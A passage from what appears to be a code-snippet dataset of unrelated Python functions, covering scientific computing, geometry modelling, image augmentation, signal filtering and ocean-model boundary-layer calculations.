columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n Y = pd.DataFrame(ML_iot_0['Y'][l,:,:], index=zInd, columns=fdInd).groupby(level=rect_level,axis=0).sum().groupby(level=rect_level,axis=1).sum()\r\n\r\n A = pd.DataFrame(ML_iot_coeff_0['A'][l,:,:], index=zInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n w = pd.DataFrame(ML_iot_coeff_0['w'][l,:,:], index=vaddInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n m = pd.DataFrame(ML_iot_coeff_0['m'][l,:,:], index=impInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n \r\n ZR_0[l] = Z.values\r\n WR_0[l] = W.values\r\n MR_0[l] = M.values\r\n YR_0[l] = Y.values\r\n \r\n AR_0[l] = A.values\r\n wR_0[l] = w.values\r\n mR_0[l] = m.values\r\n\r\n \r\n RR_0 = pd.DataFrame(ML_iot_0['R'], index=exogInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n BR_0 = pd.DataFrame(ML_iot_coeff_0['B'], index=exogInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n \r\n\r\n ML_RCOT_0 = {\r\n 'Z' : ZR_0,\r\n 'W' : WR_0,\r\n 'M' : MR_0,\r\n 'Y' : YR_0,\r\n 'R' : RR_0,\r\n }\r\n\r\n ML_RCOT_coeff_0 = {\r\n 'A' : AR_0,\r\n 'w' : wR_0,\r\n 'm' : mR_0,\r\n 'Y' : YR_0,\r\n 'B' : BR_0,\r\n }\r\n\r\n \r\n indices_RCOT = {\r\n 'prod/ind' : zInd,\r\n 'vadd' : vaddInd,\r\n 'imp' : impInd,\r\n 'fd' : fdInd,\r\n 'exog' : exogInd,\r\n 'headers' : indices['headers']\r\n }\r\n \r\n \r\n return(ML_RCOT_0, ML_RCOT_coeff_0, indices_RCOT)", "def mounting_matrix(self):\n # fmt: off\n count = 0\n for x in range(self.ntheta):\n self.M[count][count] = 1\n self.f[count][0] = self.p_in\n count = count + self.nz - 1\n self.M[count][count] = 1\n self.f[count][0] = self.p_out\n count = count + 1\n count = 0\n for x in range(self.nz - 2):\n self.M[self.ntotal - self.nz + 1 + count][1 + count] = 1\n self.M[self.ntotal - self.nz + 1 + count][self.ntotal - self.nz + 1 + count] = -1\n count = count + 1\n count = 1\n j = 0\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i][self.ntheta - 1])\n self.M[count][self.ntotal - 2 * self.nz + count] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1, j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][self.ntheta - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = self.nz + 1\n for j in range(1, self.ntheta - 1):\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i, j - 1])\n self.M[count][count - self.nz] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1][j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][j - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = count + 2\n count = 1\n for j in range(self.ntheta - 1):\n for i in range(1, self.nz - 1):\n if j == 0:\n self.f[count][0] = (self.c0w[i][j] - self.c0w[i][self.ntheta - 1]) / self.dtheta\n else:\n self.f[count][0] = (self.c0w[i, j] - self.c0w[i, j - 1]) / self.dtheta\n count = count + 1\n count = count + 2\n # fmt: on", "def get_hardwired_speed_weights(self):\n \n phase_shift=self.speed_phase_shift\n \n # row 1 has the weights of speed cells to grid cell 1\n self.W_speed_east=np.zeros_like(self.W_ee) \n self.W_speed_west=np.zeros_like(self.W_ee) \n self.W_speed_north=np.zeros_like(self.W_ee) \n self.W_speed_south=np.zeros_like(self.W_ee) \n\n if self.use_eight_directions is True:\n self.W_speed_north_east=np.zeros_like(self.W_ee) \n self.W_speed_north_west=np.zeros_like(self.W_ee) \n self.W_speed_south_east=np.zeros_like(self.W_ee) \n self.W_speed_south_west=np.zeros_like(self.W_ee) \n\n\n for phase_idx,phase in enumerate(self.gp.phases):\n shifted_north_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi/2.),self.gp.phases)\n shifted_south_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi/2.),self.gp.phases)\n shifted_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(0),self.gp.phases)\n shifted_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi),self.gp.phases)\n\n self.W_speed_north[phase_idx,:]=self.W_ee[shifted_north_phase_idx,:]\n self.W_speed_south[phase_idx,:]=self.W_ee[shifted_south_phase_idx,:]\n self.W_speed_east[phase_idx,:]=self.W_ee[shifted_east_phase_idx,:]\n self.W_speed_west[phase_idx,:]=self.W_ee[shifted_west_phase_idx,:] \n \n if self.use_eight_directions is True:\n shifted_north_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi/4),self.gp.phases)\n shifted_north_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi*3/4),self.gp.phases)\n shifted_south_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi/4),self.gp.phases)\n shifted_south_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi*3/4),self.gp.phases)\n \n self.W_speed_north_east[phase_idx,:]=self.W_ee[shifted_north_east_phase_idx,:]\n self.W_speed_north_west[phase_idx,:]=self.W_ee[shifted_north_west_phase_idx,:]\n self.W_speed_south_east[phase_idx,:]=self.W_ee[shifted_south_east_phase_idx,:]\n self.W_speed_south_west[phase_idx,:]=self.W_ee[shifted_south_west_phase_idx,:]", "def DrawBands(self, count):\n value = self.little[0]\n mobile_average = float(sum([float(self.little[i])\n for i in range(len(self.little))])) / float(self.period)\n standard_derivation = sqrt(sum([pow(self.little[i] - mobile_average, 2)\n for i in range(len(self.little))]) / self.period)\n upper_band = mobile_average + (standard_derivation * self.sd_coef)\n lower_band = mobile_average - (standard_derivation * self.sd_coef)\n self.upper.insert(0, upper_band)\n self.lower.insert(0, lower_band)\n if len(self.upper) >= self.period:\n self.upper.pop()\n if len(self.lower) >= self.period:\n self.lower.pop()\n if count >= self.period:\n for i in range(len(self.little) - 1):\n self.canvas.create_line((i * self.incr / 1.725) + self.incr * 4,\n self.height - self.incr * 4 + (self.little[i] - 1) * 5000 - 200,\n (i * self.incr / 1.725) + self.incr * 4 + self.incr / 1.725,\n self.height - self.incr * 4 + (self.little[i + 1] - 1) * 5000 - 200,\n fill = \"#FFFF00\", width = 2)\n for i in range(len(self.upper) - 1):\n self.canvas.create_line((i * self.incr / 1.635) + self.incr * 4,\n self.height - self.incr * 4 + (self.upper[i] - 1) * 5000 - 200,\n (i * self.incr / 1.635) + self.incr * 4 + self.incr / 1.635,\n self.height - self.incr * 4 + (self.upper[i + 1] - 1) * 5000 - 200,\n fill = \"#FF6600\", width = 3)\n self.canvas.create_line((i * self.incr / 1.635) + self.incr * 4,\n self.height - self.incr * 4 + (self.lower[i] - 1) * 5000 - 200,\n (i * self.incr / 1.635) + self.incr * 4 + self.incr / 1.635,\n self.height - self.incr * 4 + (self.lower[i + 1] - 1) * 5000 - 200,\n fill = \"#FF0000\", width = 3)", "def __hinterpolate(self):\n \n # Temp. Data holders\n upperint = []\n lowerint = []\n \n # Dont like this, because here we insert points into the rawdata\n # But it creates consisitent results in the interpolation results\n if self.__upper[0][0] != 0: self.__upper.insert(0,(0.,0.))\n if self.__lower[0][0] != 0: self.__lower.insert(0,(0.,0.))\n \n # Create points\n if self.__interpolation_method == \"l\":\n xpointsU = list(map(lambda x:x/float(self.__procPointsCount),range(0,self.__procPointsCount+1)))\n xpointsL = list(map(lambda x:x/float(self.__procPointsCount),range(0,self.__procPointsCount+1)))\n elif self.__interpolation_method == \"p\":\n xpointsU = [x**2/float(self.__procPointsCount)**2 for x in range(self.__procPointsCount+1)]\n xpointsL = [x**2/float(self.__procPointsCount)**2 for x in range(self.__procPointsCount+1)]\n \n # Calculate secants\n uppersec = [(self.__upper[i+1][1]-self.__upper[i][1])/(self.__upper[i+1][0]-self.__upper[i][0]) for i in range(len(self.__upper)-1)]\n lowersec = [(self.__lower[i+1][1]-self.__lower[i][1])/(self.__lower[i+1][0]-self.__lower[i][0]) for i in range(len(self.__lower)-1)]\n \n # Calculate tangents\n uppertan = [(uppersec[k-1]+uppersec[k])/2 for k in range(1,len(uppersec))]\n uppertan.insert(0,uppersec[0])\n uppertan.append(uppersec[-1])\n\n lowertan = [(lowersec[k-1]+lowersec[k])/2 for k in range(1,len(lowersec))]\n lowertan.insert(0,lowersec[0])\n lowertan.append(lowersec[-1])\n \n # Hermite blending functions\n p0 = lambda t: 2*t**3 - 3*t**2 + 1\n m0 = lambda t: t**3 - 2*t**2 + t\n p1 = lambda t: -2*t**3 + 3*t**2\n m1 = lambda t: t**3 - t**2\n \n # Find matching points to improve accuarcy\n matchU = [(i,j) for i in range(len(xpointsU)) for j in range(len(self.__upper)) if xpointsU[i] == self.__upper[j][0]]\n matchL = [(i,j) for i in range(len(xpointsL)) for j in range(len(self.__lower)) if xpointsL[i] == self.__lower[j][0]]\n \n # Reverse match pairs to insure no index errors\n matchU.reverse()\n matchL.reverse()\n\n# print(self.__lower)\n# print(xpointsL)\n # Pop xpoints that dont require interpolation and append the point into the upperint list\n for i in matchU:\n xpointsU.pop(i[0])\n upperint.append(self.__upper[i[1]])\n \n# print(matchL)\n \n # Same process as above but for lower airfoil\n for i in matchL:\n xpointsL.pop(i[0])\n lowerint.append(self.__lower[i[1]])\n \n # Interpolate upper points\n for xp in xpointsU:\n for i in range(len(self.__upper)-1):\n if self.__upper[i][0] < xp < self.__upper[i+1][0]:\n h = self.__upper[i+1][0]-self.__upper[i][0]\n t = (xp - self.__upper[i][0]) / h\n solution = ( p0(t)*self.__upper[i][1] + h*m0(t)*uppertan[i] + p1(t)*self.__upper[i+1][1] + h*m1(t)*uppertan[i+1] )\n upperint.append((xp,solution))\n \n # Interpolate lower points\n for xp in xpointsL:\n for i in range(len(self.__lower)-1):\n if self.__lower[i][0] < xp < self.__lower[i+1][0]:\n h = self.__lower[i+1][0]-self.__lower[i][0]\n t = (xp - self.__lower[i][0]) / h\n solution = ( p0(t)*self.__lower[i][1] + h*m0(t)*lowertan[i] + p1(t)*self.__lower[i+1][1] + h*m1(t)*lowertan[i+1] )\n lowerint.append((xp,solution))\n \n # Sort the points to keep the correct sequence\n upperint.sort(key=lambda x:x[0], reverse=True)\n lowerint.sort(key=lambda x:x[0])\n \n # Do checks to insure no duplicates\n if upperint[0][0] != 1.0: upperint.insert(0,(1.0,0.0))\n if upperint[-1][0] != 0.0: upperint.append((0.0,0.0))\n if lowerint[0][0] == 0.0: lowerint.pop(0)\n if lowerint[-1][0] != 1.0: lowerint.append((1.0,0.0))\n\n self.__ProcPoints = upperint + lowerint", "def stairs_4(taille):\n a = np.arange(taille)\n b = np.hstack((a, taille, np.flip(a)))\n return b + b.reshape(-1, 1) # ou b + b[:, np.newaxis]", "def augment_stretch(img, mask, scale_range):\n\n tr_x1 = scale_range * np.random.uniform()\n tr_y1 = scale_range * np.random.uniform()\n p1 = (tr_x1, tr_y1)\n tr_x2 = scale_range * np.random.uniform()\n tr_y2 = scale_range * np.random.uniform()\n p2 = (img.shape[0] - tr_x2, tr_y1)\n\n p3 = (img.shape[0] - tr_x2, img.shape[1] - tr_y2)\n p4 = (tr_x1, img.shape[1] - tr_y2)\n\n pts1 = np.float32([[p1[0], p1[1]],\n [p2[0], p2[1]],\n [p3[0], p3[1]],\n [p4[0], p4[1]]])\n pts2 = np.float32([[0, 0],\n [img.shape[1], 0],\n [img.shape[1], img.shape[0]],\n [0, img.shape[0]]]\n )\n\n M = cv2.getPerspectiveTransform(pts1, pts2)\n img = cv2.warpPerspective(img, M, (img.shape[0], img.shape[1]))\n img = np.array(img, dtype=np.uint8)\n if mask is not None:\n mask = cv2.warpPerspective(mask, M, (mask.shape[0], mask.shape[1]))\n mask = np.array(mask, dtype=np.uint8)\n\n return img, mask", "def _propagate_A(self):\n A_roots = np.roots(self.A)\n A_roots_norm = [r if np.abs(r) < 1 else 1/np.conj(r) for r in A_roots]\n A_poly = np.poly(A_roots_norm)\n self.alpha_g = -A_poly[1:]\n self.A = np.concatenate([[1], -self.alpha_g])\n\n self.rev_A = self.A[::-1]\n\n self.pie = np.dot(self.M_mu, self.rev_A)\n self.pi = self.pie*self.e\n self.p = self.pi*self.d\n\n\n M_R = np.lib.stride_tricks.as_strided(self.R_pad,\n shape=[self.L_h, self.L_h, self.P+1],\n strides=[self.R_pad.strides[0], self.R_pad.strides[1], self.R_pad.strides[0]])\n self.half_pie_var = np.dot(M_R, self.rev_A)\n self.half_pie_var_pad = np.pad(self.half_pie_var, [(0, 0), (self.P, 0)], 'constant')\n self.M_half_pie_var_pad = np.lib.stride_tricks.as_strided(self.half_pie_var_pad,\n shape=[self.L_h, self.P+1],\n strides=[self.half_pie_var_pad.strides[0]+self.half_pie_var_pad.strides[1], self.half_pie_var_pad.strides[1]])\n\n self.pie_var = np.dot(self.M_half_pie_var_pad, self.rev_A)", "def normalize_mirage(wn, data, breaks=[(922,926), (1202,1206), (1448,1452)],\n endpoints=6, slopefactor=.5):\n data = data.copy()\n if not len(data):\n return data, None\n flipwn = wn[0] > wn[-1]\n if flipwn:\n data = data[:, ::-1]\n wn = wn[::-1]\n breaks = find_wn_ranges(wn, np.array(breaks))\n cuts = np.concatenate(([0], breaks.flatten(), [len(wn)])).reshape((-1, 2))\n\n # Straight baseline of each segment. shape=(ncuts, 2, nspectra)\n scale = np.zeros(cuts.shape + (len(data),))\n # Overall level in each segment\n dsum = np.zeros(len(cuts))\n slopes = np.zeros(cuts.shape)\n cutpoints = np.zeros(cuts.shape)\n\n def linreg(x, y):\n xm = x.mean()\n ym = y.mean(1)\n rx = x - xm\n s = (rx * (y.T - ym).T).sum(1) / (rx * rx).sum()\n return xm, ym, s\n\n for i in range(len(cuts)):\n cb = cuts[i][0]\n ce = cuts[i][1]\n cwidth = min(endpoints, (ce - cb) // 2)\n\n wb = linreg(wn[cb:cb+cwidth], np.abs(data[:, cb:cb+cwidth]))\n we = linreg(wn[ce-cwidth:ce], np.abs(data[:, ce-cwidth:ce]))\n\n cutpoints[i, :] = [wb[0], we[0]]\n # sc = np.maximum([wb[1], we[1]], 1)\n sc = [wb[1], we[1]]\n scale[i,:,:] = sc\n slopes[i, :] = np.array([wb[2], we[2]]).mean(1)\n # need to handle negative values here!\n # dsum[i] = np.abs(data[:, cb:ce]).sum()\n dsum[i] = np.maximum(data[:, cb:ce], 0).sum()\n # Mean level of all spectra in each of the cut points\n means = scale.mean(2)\n # Make the mean levels identical on both sides of the cuts\n for i in range(len(means)-1):\n mm = min(means[i][1], means[i+1][0])\n ds = (slopes[i+1, 0] + slopes[i, 1]) / mm * (\n wn[cuts[i+1, 0]] - wn[cuts[i, 1]]) * slopefactor\n ds = max(-.5, min(.5, ds))\n means[i][1] = mm * (1 - ds)\n means[i+1][0] = mm * (1 + ds)\n # print('means', means)\n scale = (scale.T / means.T).T\n weights = dsum / dsum.mean()\n scale = scale / ((scale.min(1).T * weights).mean(1))\n # scale = scale / ((scale.mean(1).T * weights).mean(1))\n\n for i in range(len(cuts)):\n cb = cuts[i][0]\n ce = cuts[i][1]\n data[:, cb:ce] /= np.linspace(scale[i][0], scale[i][1], ce-cb, axis=-1)\n if i:\n pce = cuts[i-1][1]\n data[:, pce:cb] = np.linspace(data[:, pce-1], data[:, cb], cb-pce+1,\n endpoint=False, axis=-1)[:,1:]\n scale = scale.reshape((-1, len(data))).T\n if flipwn:\n data = data[:,::-1]\n return data, scale", "def create_region_w_spacing (tuple_top_L, tuple_bottom_R):\n\n spacing = int(input ('How many well spaces do you want between each spot? '))\n\n\n #get the plate column numbers from the plate class\n columns = plate1536.columns\n #get the plate rows from the plate class\n rows = plate1536.rows\n\n ###Begin creating list of columns to use###\n\n #initialize and use next\n curr_col_idx = columns.index(int(tuple_top_L[1]))\n\n #set left most column to use as the column given by user in top_left\n col_idxs_to_shoot = [curr_col_idx]\n\n #loop checks the NEXT column that will be produced by moving right\n #by (spacing + 1). If that is beyond the right-most border set by\n #the well region definitions, then it will stop, containing all\n #column choices within the left and right bounds\n while (curr_col_idx + spacing + 1) <= columns.index(int(tuple_bottom_R[1])):\n\n curr_col_idx += (spacing + 1)\n\n col_idxs_to_shoot.append(curr_col_idx)\n\n ###The list of indices in plate1536.columns to use is now set###\n\n\n ###Begin creating list of rows to use###\n\n #initialize and use next\n curr_row_idx = rows.index(tuple_top_L[0])\n\n #set top most row to use as the row given by user in top_left\n row_idxs_to_shoot = [curr_row_idx]\n\n #loop checks the NEXT row that will be produced by moving down\n #by (spacing + 1). If that is beyond the bottom-most border set by\n #the well region definitions, then it will stop, containing all\n #row choices within the top and bottom bounds\n while (curr_row_idx + spacing + 1) <= rows.index(tuple_bottom_R[0]):\n\n curr_row_idx += (spacing + 1)\n\n row_idxs_to_shoot.append(curr_row_idx)\n\n ###The list of indices in plate1536.rows to use is now set###\n\n\n #get all the columns you want to use as STRINGS\n col_strs = []\n for i in col_idxs_to_shoot:\n col_strs += [ str(plate1536.columns[i]) ] #have to have extra list brackets to avoid python interpreting a string 'FFF' as\n #a list ['F', 'F', 'F'] and adding 3 items instead of 'FFF'\n\n #get all the rows you want to use as STRINGS\n row_strs = []\n for i in row_idxs_to_shoot:\n row_strs += [ plate1536.row_dict[i] ]#have to have extra list brackets to avoid python interpreting a string 'FFF' as\n #a list ['F', 'F', 'F'] and adding 3 items instead of 'FFF'\n\n\n print(\"This region has {} rows (letters), {} columns (#'s) per row. That's a total of {} spots\".format(len(row_strs), len(col_strs), len(row_strs) * len(col_strs)))\n\n return row_strs, col_strs", "def make_steer_frs(dims, numlevels, numorientations, bandwidth):\n \n result = []\n bands=[]\n p = numorientations-1\n const = math.sqrt(float(math.pow(2,(2*p))*math.pow(math.factorial(p),2)) / float(math.factorial(2*p)*(p+1)))\n f1 = freqspace(dims[0])\n f2 = freqspace(dims[1])\n wx, wy = np.meshgrid(f1, f2)\n size = wx.shape\n r = np.sqrt(wx**2 + wy**2)\n theta = np.arctan2(wy, wx) \n \n bands = np.full((numlevels, numorientations, dims[0], dims[1]), const*1j)\n for level in range(numlevels):\n for orientation in range(numorientations):\n theta_offset = orientation * np.pi / numorientations\n ctrfreq = pi / math.pow(2, (level+1)*bandwidth)\n band = np.cos(theta - theta_offset)**p * log_raised_cos(r, ctrfreq, bandwidth)\n bands[level,orientation,:,:] *= band\n \n hi = log_raised_coshi(r, pi / math.pow(2, bandwidth), bandwidth)\n\n lo = log_raised_coslo(r, pi / math.pow(2, bandwidth * numlevels), bandwidth)\n \n result.append(hi)\n result.append(bands)\n result.append(lo)\n return result", "def _lathe(self, path, sides=12, rise=0.0, loops=1.0):\r\n self.sides = sides\r\n\r\n s = len(path)\r\n rl = int(self.sides * loops)\r\n\r\n pn = 0\r\n pp = 0\r\n tcx = 1.0 / self.sides\r\n pr = (pi / self.sides) * 2.0\r\n rdiv = rise / rl\r\n\r\n # Find largest and smallest y of the path used for stretching the texture\r\n miny = path[0][1]\r\n maxy = path[s-1][1]\r\n for p in range(s):\r\n if path[p][1] < miny:\r\n miny = path[p][1]\r\n if path[p][1] > maxy:\r\n maxy = path[p][1]\r\n\r\n verts = []\r\n norms = []\r\n idx = []\r\n tex_coords = []\r\n\r\n opx = path[0][0]\r\n opy = path[0][1]\r\n\r\n for p in range(s):\r\n\r\n px = path[p][0] * 1.0\r\n py = path[p][1] * 1.0\r\n\r\n tcy = 1.0 - ((py - miny) / (maxy - miny))\r\n\r\n # Normalized 2D vector between path points\r\n dx, dy = Utility.vec_normal(Utility.vec_sub((px, py), (opx, opy)))\r\n\r\n for r in range (0, rl):\r\n sinr = sin(pr * r)\r\n cosr = cos(pr * r)\r\n verts.append((px * sinr, py, px * cosr))\r\n norms.append((-sinr * dy, dx, -cosr * dy))\r\n tex_coords.append((1.0 - tcx * r, tcy))\r\n py += rdiv\r\n\r\n # Last path profile (tidies texture coords).\r\n verts.append((0, py, px))\r\n norms.append((0, dx, -dy))\r\n tex_coords.append((0, tcy))\r\n\r\n if p < s - 1:\r\n pn += (rl + 1)\r\n for r in range(rl):\r\n idx.append((pp + r + 1, pp + r, pn + r))\r\n idx.append((pn + r, pn + r + 1, pp + r + 1))\r\n pp += (rl + 1)\r\n\r\n opx = px\r\n opy = py\r\n\r\n return Buffer(self, verts, tex_coords, idx, norms)", "def relTrace(mat, spinorsize):\n\n top = mat[:spinorsize, :spinorsize]\n bottom = mat[spinorsize:, spinorsize:]\n return 2*(top+bottom)", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)", "def high_level(low_scores, query, template_length):\n h_mat = prog_dynam_matrix(list(range(template_length)), query)\n h_mat.create_content()\n h_mat.fill_high(low_scores)\n h_mat.show()\n h_mat.optimal_path()", "def align(): # open EH and fast shutter\n\t#marAuxiliary.closeMarShield()\n\td2in()\n\td3in()\n\tsh('o')", "def major_loop(self):\r\n\r\n upper_curve = self.shape[0]-1\r\n upper_curve_length = np.sum(self.h[upper_curve] >= self.hr[upper_curve, 0])\r\n h = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n hr = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n m = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n\r\n for i in range(upper_curve_length-1):\r\n pt_index = self.shape[1]-1-i\r\n h[i] = self.h[upper_curve, pt_index]\r\n hr[i] = self.hr[upper_curve, pt_index]\r\n m[i] = self.m[upper_curve, pt_index]\r\n for i in range(self.shape[0]):\r\n forc_index = self.shape[0]-1-i\r\n major_loop_index = upper_curve_length-1+i\r\n h[major_loop_index] = self.hr[forc_index, 0]\r\n hr[major_loop_index] = self.hr[forc_index, 0]\r\n m[major_loop_index] = self.m[forc_index, self.h[forc_index] >= self.hr[forc_index, 0]][0]\r\n\r\n h[self.shape[0]+upper_curve_length-2:] = self.h[0, self.h[0] >= self.hr[0, 0]]\r\n hr[self.shape[0]+upper_curve_length-2:] = self.hr[0, self.h[0] >= self.hr[0, 0]]\r\n m[self.shape[0]+upper_curve_length-2:] = self.m[0, self.h[0] >= self.hr[0, 0]]\r\n\r\n return h, hr, m", "def rrhr(band,skypos,tranges,skyrange,width=False,height=False,stepsz=1.,\n\t\t verbose=0,calpath='../cal/',tscale=1000.,response=True,hdu=False,\n\t\t retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\t# TODO the if width / height\n\n\tflat = get_fits_data(flat_filename(band,calpath),verbose=verbose)\n\tflatinfo = get_fits_header(flat_filename(band,calpath))\n\tnpixx,npixy \t= flat.shape\n\tfltsz \t\t= flat.shape\n\tpixsz = flatinfo['CDELT2']\n\tdetsize = 1.25\n\n\t# Rotate the flat into the correct orientation to start.\n\tflat = np.flipud(np.rot90(flat))\n\n\t# NOTE: This upsample interpolation is done _last_ in the canonical\n\t#\tpipeline as part of the poissonbg.c routine.\n\t# \tThe interpolation function is \"congrid\" in the same file.\n\t# TODO: Should this be first order interpolation? (i.e. bilinear)\n\thrflat = scipy.ndimage.interpolation.zoom(flat,4.,order=0,prefilter=False)\n\timg = np.zeros(hrflat.shape)[\n\t\t\t\thrflat.shape[0]/2.-imsz[0]/2.:hrflat.shape[0]/2.+imsz[0]/2.,\n\t\t\t\thrflat.shape[1]/2.-imsz[1]/2.:hrflat.shape[1]/2+imsz[1]/2.]\n\n\tfor trange in tranges:\n\t\tt0,t1=trange\n\t\tentries = gQuery.getArray(gQuery.aspect(t0,t1),retries=retries)\n\t\tn = len(entries)\n\n\t\tasptime = np.float64(np.array(entries)[:,2])/tscale\n\t\taspra = np.float32(np.array(entries)[:,3])\n\t\taspdec = np.float32(np.array(entries)[:,4])\n\t\tasptwist= np.float32(np.array(entries)[:,5])\n\t\taspflags= np.float32(np.array(entries)[:,6])\n\t\tasptwist= np.float32(np.array(entries)[:,9])\n\t\taspra0 = np.zeros(n)+skypos[0]\n\t\taspdec0 = np.zeros(n)+skypos[1]\n\n\t\txi_vec, eta_vec = gnomonic.gnomfwd_simple(\n\t\t\t\t\t\t\taspra,aspdec,aspra0,aspdec0,-asptwist,1.0/36000.,0.)\n\n\t\tcol = 4.*( ((( xi_vec/36000.)/(detsize/2.)*(detsize/(fltsz[0]*pixsz)) + 1.)/2. * fltsz[0]) - (fltsz[0]/2.) )\n\t\trow = 4.*( (((eta_vec/36000.)/(detsize/2.)*(detsize/(fltsz[1]*pixsz)) + 1.)/2. * fltsz[1]) - (fltsz[1]/2.) )\n\n\t\tvectors = rotvec(np.array([col,row]),-asptwist)\n\n\t\tfor i in range(n):\n\t\t\tif verbose>1:\n\t\t\t\tprint_inline('Stamping '+str(asptime[i]))\n\t\t\t\t# FIXME: Clean this mess up a little just for clarity.\n\t \timg += scipy.ndimage.interpolation.shift(scipy.ndimage.interpolation.rotate(hrflat,-asptwist[i],reshape=False,order=0,prefilter=False),[vectors[1,i],vectors[0,i]],order=0,prefilter=False)[hrflat.shape[0]/2.-imsz[0]/2.:hrflat.shape[0]/2.+imsz[0]/2.,hrflat.shape[1]/2.-imsz[1]/2.:hrflat.shape[1]/2+imsz[1]/2.]*dbt.compute_exptime(band,[asptime[i],asptime[i]+1],verbose=verbose,retries=retries)*gxt.compute_flat_scale(asptime[i]+0.5,band,verbose=0)\n\n\treturn img", "def get_hbls_hbbl(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n z_u_r = self.grid_dict['z_u_r']\n u = self.u\n v = self.v\n \n v_upts = TTTW_func.v2u(v)\n Hz = z_u_w[:,1:] - z_u_w[:,:-1]\n\n\n\n # CALCULATE swr_frac\n self.swr_frac = TTTW_func.lmd_swr_frac(self.grid_dict)\n\n\n # WHOLE THING HAPPENS IN j loop through y-indices\n \n # INITIALIZE ARRAYS\n self.kmo = np.zeros([Ly])\n self.Cr = np.zeros([Ly])\n self.kbl = np.empty([Ly],dtype='int')\n self.C_h_MO = np.zeros([Ly])\n self.Cr = np.zeros([Ly,N+1]) # sum term\n self.FC = np.zeros([Ly,N+1])\n self.swdk_r = np.zeros([Ly,N+1])\n \n self.zscale = np.zeros([Ly,N])\n self.Kern = np.zeros([Ly,N])\n\n \n # --> LOOP THROUGH Y-INDICES\n for j in range(Ly):\n if self.LIMIT_MO_DEPTH:\n self.kmo[j] = 0\n self.C_h_MO[j] = self.C_MO *self.ustar[j]**3/self.vonKar\n \n self.kbl[j] = 0\n self.Cr[j,-1] = 0 # set top Cr\n self.Cr[j,0] = 0 # set bottom Cr\n \n # SEARCH FOR MIXED LAYER DEPTH\n self.FC[j,-1] = 0.\n\n\n # ---> LOOP TOP TO BOTTOM (FORTRAN ==> k=N-1,1,-1)\n for k in range(N-1,0,-1):\n # INDEX MAP\n k_r = k-1\n k_w = k\n\n \n zscale = z_u_w[j,N] - z_u_r[j,k_r]\n self.zscale[j,k_w] = zscale\n if self.LMD_KPP:\n if self.LMD_BKPP:\n zscaleb = z_u_r[j,k_r] - z_u_w[j,0]\n Kern = zscale * zscaleb**2 / ( (zscale + self.epssfcs*self.hbls_old[j]) * 